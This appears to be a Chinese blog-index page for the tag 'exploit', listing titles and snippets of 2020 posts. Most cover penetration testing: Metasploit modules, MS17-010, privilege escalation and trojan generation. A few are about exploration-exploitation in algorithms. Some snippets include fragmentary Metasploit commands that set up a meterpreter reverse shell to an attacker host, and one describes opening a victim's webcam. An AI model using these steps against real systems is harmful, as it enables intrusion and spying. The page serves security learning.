exploit

shiro_RCE

特征前端页面特征1rememberMe特征2ShiroExploit利用过程123工具链接:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases
好好睡觉鸭·2020-12-12 00:16

渗透测试笔试面试题目汇总

渗透测试流程概述前期交互阶段、情报搜集阶段、威胁建模阶段、漏洞分析阶段、渗透攻击阶段(Exploitation)、后渗透攻击阶段(怎么一直控制,维持访问)、报告阶段。
Bulldozer Coder·2020-11-25 10:38

天融信网安公开课直播笔记(一):渗透测试情报搜集

二、信息收集方法及技巧1.Google黑客语句GoogleHacking资料库https://www.exploit-db.com/google-hacking-database利用搜索引擎通过特殊语句获取需要
JUDAI_PLUS·2020-11-23 21:31

msf之木马程序

目录捆绑木马生成木马文件附:msfvenom介绍msfvenom简介msfvenom生成exploit/multi/handler模块简介设置监听反弹发送木马查看对方的ip查看对方目录截图开启摄像头附:
ZZ100861122·2020-11-10 19:55

msf与cs互相传动

CS->MSFMSF:useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_httpCS:创建监听器windows/foreign/
Mamba start·2020-10-10 15:41

ductf2020 pwn-or-web v8

题目信息Author:FaithWhydosomepeoplethinkbrowserexploitation==web?
HAPPYers·2020-10-05 22:17

电影的制作模式

2.剥削劳动及独立制片(Exploitation&IndependentProduction)有一些电影属于独立制作,因为在
ONGGiJa·2020-09-19 03:06

Metasploit Framework(2)Exploit模块、Payload使用

文章的格式也许不是很好看,也没有什么合理的顺序完全是想到什么写一些什么,但各个方面都涵盖到了能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道Exploit模块分为主动和被动(Active、Passive
weixin_30767921·2020-09-17 15:56

Exploitation和Exploration

Exploration&Exploitation的理解Fromhttps://www.jianshu.com/p/22c4f36a52ff1.介绍1.1探索与利用间的困境Onlinedecision-makinginvolvesafundamentalchoice
walkerfan·2020-09-17 13:10

"exploitation"和 "exploration"的区别

Metaheuristicsinstructuraloptimizationanddiscussionsonharmonysearchalgorithm》----M.P.Sakaa,O.Hasançebib,Z.W.GeemExploitationandExplorationaretwobasiccomponentsofanymetaheuristicalgorithm.Exploitation
就问你难不难受0_o·2020-09-17 11:21

推荐系统中的exploration-exploitation算法

推荐系统里面有两个经典问题:EE和冷启动。前者涉及到平衡准确和多样,后者涉及到产品算法运营等一系列。Bandit算法是一种简单的在线学习算法,常常用于尝试解决这两个问题,本文为你介绍基础的Bandit算法及一系列升级版,以及对推荐系统这两个经典问题的思考。什么是Bandit算法为选择而生我们会遇到很多选择的场景。上哪个大学,学什么专业,去哪家公司,中午吃什么等等。这些事情,都让选择困难症的我们头很
Bordery·2020-09-17 10:32

linux普通用户提权root

用普通用户boy作为测试对象[boy@localhost~]$mkdir/tmp/exploit[boy@localhost~]$ln/bin/ping/tmp/exploit/target#使用ping
whoim_i·2020-09-17 08:12

使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。
magictong·2020-09-17 07:46

Metasploit测试暴雷漏洞 (编号CVE-2012-1889)

详细步骤:1.在exploit-db中寻找漏洞相关的rb文件,(注意:在下载的时候记得关闭各种360以及电脑管家和电脑自带防火墙,不然会有病毒报错),下载地址:https://www.exploit-db.com
exploitZhou·2020-09-17 07:43

CVE-2012-1675

描述:TheremoteOracleTNSlistenerallowsserviceregistrationfromaremotehost.Anattackercanexploitthisissuetodivertdatafromalegitimatedatabaseserverorclienttoanattacker-specifiedsystem.Successfulexploitswilla
DBAngelica·2020-09-17 06:15

objdump的使用方法

对于一般只想让自己程序跑起来的程序员,这个命令没有更多意义,对于想进一步了解系统的程序员,应该掌握这种工具,至少你可以自己写写shellcode了,或者看看人家给的exploit中的shellcode是什么东西
t_larry·2020-09-17 05:20

Hacking: The Art of Exploitation 读书笔记(一)代码调试技巧

GDB相关-q不打印版本信息功能:setdisassemble-flavorintel/att设置汇编语法list:打印代码disassemble:反汇编break:设置断点run:运行查看内存x进制:oxut列出附近几条存储信息:x/2显示方式:bhwg(gdb)x/8xb$eip0x8048384:0xc70x450xfc0x000x000x000x000x83inforegisterxxx:
我是章鱼烧烧烧·2020-09-17 04:17

如何从Exploit-DB中添加模块至Metasploit

如何从Exploit-DB中添加模块至Metasploit前言1、搜索漏洞信息2、使用searchsploit进行本地搜索3、复制rb文件4、use载入模块前言系统:Linuxkali5.2.0-kali2
夜会美丶·2020-09-17 04:30

人脸反欺诈检测的当前进展

多模态数据集中的概述:Kimetal.[22]aimtodistinguishbetweenthefacialskinandmaskmaterialsbyexploitingtheirreflectance.Koseetal
guanguanboy·2020-09-16 15:23

Exploit,shellcode经验技巧谈

这篇文章不是教你如何去写exploit,shellcode,而是希望提供一些关于编写或者研究exploit,shellcode的经验和技巧。适合理解了shellcode编写原理的朋友。
linkqishi·2020-09-16 08:34

在BT5里Metasploit内网***(exploit/windows/smb/psexec)

192.168.111.134***条件:知道目标机器的ip用户名密码因为非法测试是不允许的,所以我在虚拟机里面实验首先,我们来查看bt5和win2k3的ip地址进入msfconsole进行***实验实验使用的漏洞是exploit
weixin_33943836·2020-09-16 01:52

msf之木马程序

目录捆绑木马生成木马文件附:msfvenom介绍msfvenom简介msfvenom生成exploit/multi/handler模块简介设置监听反弹发送木马查看对方的ip查看对方目录截图开启摄像头附:
ihszg·2020-09-15 21:03

phpstudy配置laravel的伪静态

在域名管理中点击伪静态输入如下代码保存就i行了:#Checkifafileexists,orrouteittoindex.php.try_files$uri$uri//exploit/index.php
Yietion·2020-09-15 18:22

spring boot的Thymeleaf模板注入

参考:java安全开发之springbootThymeleaf模板注入https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf
caiqiiqi·2020-09-15 10:13

[CVE-2019-2725] Weblogc XMLDecoder RCE

0014xCVE-2019-2725/blob/master/weblogic_rce.pyhttps://github.com/pimps/CVE-2019-2725/blob/master/weblogic_exploit.pyWeblogic
caiqiiqi·2020-09-15 10:13

metasploit简单使用-生成木马反弹shell连接

windows_defender_exesetfilenametest.exesetpayloadwindows/meterpreter/reverse_tcpsetlhost192.168.1.11setlport5555exploit
星空你好·2020-09-15 09:36

Python脚本与Metasploit交互进行自动永恒之蓝攻击

我们首先利用findTarget()函数找到目标网段或目标主机中开放了445端口的主机,然后利用confickerExploit()函数将攻击代码写入configure.rc配置文件中,最后调用MSF框架读取配置文件进行攻击
谢公子·2020-09-15 08:34

ISCA 2018 论文 部分(一)

论文部分(一)ISCA2018论文部分(一)1、DivisionofLabor:AMoreEffectiveApproachtoPrefetching2、ComputationReuseinDNNsbyExploitingInputSimilarity3
bubble_zyc·2020-09-15 06:23

Linux kernel Exploit 内核漏洞学习(0)-环境安装

前言在Linux上面搞事情很多东西都可能需要我们利用源码来自己编译,相对于Windows来讲可能会比较麻烦和耗时,这个过程中肯定会遇到很多报错,所以一定要有耐心…方法步骤编译内核首先到linux内核的官网下载一份内核源代码并解压:至于需要下载的版本,随意就好,我下载的是5.2.1的…然后先安装有些依赖:sudoapt-getinstallgitfakerootbuild-essentialncur
钞sir·2020-09-15 05:09

linux内核漏洞利用初探(2):demo-null_dereference

1.NULLDereference(1)介绍古老的LinuxNULLpointerdereferenceexploit,映射0地址分配shellcode运行(2)漏洞代码#include#include
bsauce·2020-09-15 05:24

使用WebRTC开发Android Messenger:第3部分

文/NatalieSilvanovich原文链接:https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messe
LiveVideoStack_·2020-09-14 23:17

内网渗透哈希传递攻击

MSF哈希传递攻击条件:获取到了某台主机的Administrator用户的LM-Hash和NTLM-Hash,并且该主机的445端口打开着,可利用exploit/windows/smb/psexec漏洞用
L-socks·2020-09-14 21:39

BEEF的使用(简单版)

BeEFBEEF(TheBrowserExploitationFramework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。
L-socks·2020-09-14 21:39

metasploit--multi/samba/usermap_script

metasploit的multi/samba/usermap_script使用1、searchsamba在渗透代码库中找出攻击Samba服务的模块2、useexploit/multi/samba/usermap_script
click#15·2020-09-14 21:38

kali linux之msf后渗透阶段

已经获得目标操作系统控制权后扩大战果提权信息收集渗透内网永久后门基于已有session扩大战果绕过UAC限制useexploit/windows/local/asksetsession-idsetfilenameuseexploit
weixin_30606461·2020-09-14 20:17

MSF里侦听模块的使用教程 exploit/multi/handler

标题关于MSF侦听模块的第一次使用侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7
F&G·2020-09-14 20:59

Metasploit利用kali命令获取针对不同目标环境的渗透攻击模块数量

在Metasploit控制台程序中,使用命令searchtype:exploittarget:windows2000,如下:观察到关于windows2000的渗透攻击模块数量为170。
Dagger-axe-x·2020-09-14 19:52

Metasploit usermap_script漏洞相关笔记

模块的位置exploit/multi/samba/usermap_sc
isinstance·2020-09-14 19:38

metasploit利用CVE-2017-11882

/msfconsoleuseexploit/windows/fileformat/cve_2017_11882setURIPATHtestsetpayloadwindows/meterpreter/reverse_tcpsetlhost172.18.126.113setFILENAMEhelloword.doc
caiqiiqi·2020-09-14 18:33

1.MS17-010 漏洞利用

192.168.223.134,发现以下漏洞:2)漏洞利用攻击对象:192.168.223.134,kali:192.168.223.135(1)进入MSF框架(2)查询漏洞模块并使用searchms17_010useexploit
southwind0·2020-09-14 18:26

SMB MS17-010 利用(CVE-2017-0144 )

exploit-db:https://www.exploit-db.com/exploits/42315/该漏洞的影响版本很广泛:MicrosoftWindowsWindows7/8.1/2008R2/
weixin_30408309·2020-09-14 17:07

从CVE-2007-1567分析学习构造poc

漏洞概况漏洞编号:CVE-2007-1567漏洞类型:远程任意代码执行漏洞成因:堆栈缓冲区溢出漏洞软件:WarFTPDaemon(1.65及之前版本)资源连接:https://www.exploit-db.com
useror·2020-09-14 17:33

stack canary之pwnbale.kr MD5 calculator

WemadeasimpleMD5calculatorasanetworkservice.Findabugandexploitittogetashell.Download:http://pwnable.kr
久许·2020-09-14 14:38

PHPCMS v9.2.4文件上传漏洞分析【附Exploit

phpcms版本:v9.2.4利用条件:由于文件上传利用了Apache解析漏洞,因此只适用于Linux+Apache网站,Windows下的Apache似乎不存在解析漏洞1、攻击演示(1)本地搭建phpcmsv9.2.4环境(2)随便访问一个页面,用burpsuite抓住这个数据包,修改抓住的http数据包如下图所示:要注意的几点如下:1、一定要是POST请求2、URL中的“m、c、a”这三个参数
MySQL-·2020-09-14 11:31

mimikatz实战抓管理员密码和 bypass uac

之后必须是管理员的权限(system)一般思路:先拿shell,再想办法提升权限获取一个shell是前提1>达到实验效果即可,这里通过msf自带功能生成一个123.exe,详细上一篇文章有笔记2>msf设置监听useexploit
莫憨憨·2020-09-14 08:56

MS16-032 漏洞复现

exploit-db的详情:https://www.exploit-db.com/exploits/39574/Windows:SecondaryLogonStandardHandlesMissingSanitizationEoPPlatform
weixin_34324081·2020-09-14 08:34

Windows内核漏洞利用提权教程

Windows-Exploit-suggesterMetasploit内置模块提供了各种可用于提权的localexploit
systemino·2020-09-14 07:22

msf之使用震网三代来提权

cve_2017_8464_lnk_lpe,他就是震网三代的exploit上次没有成功将x64的搞定,现在搬来了震网三代看我来个远程执行漏洞的提权前面已经拿到shell,但没有system权限我也是稍微找了以下
佛性死磕·2020-09-14 07:51

渗透测试-windows EXP提权

windowsEXP提权QQ1285575001WechatM010527技术交流QQ群599020441纪年科技amingEXP溢出提权(不可以使用技巧/无障碍提权)exploit—>windows溢出利用
amingMM·2020-09-14 07:15

MS16-032 提权

WindowsVista、Windows7、Windows8.1、Windows10、Windows2008Server、Windows2012Server漏洞利用脚本下载地址:https://www.exploit-db.com
prettyX·2020-09-14 07:30
上一页 10 11 12 13 14 15 16 17 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他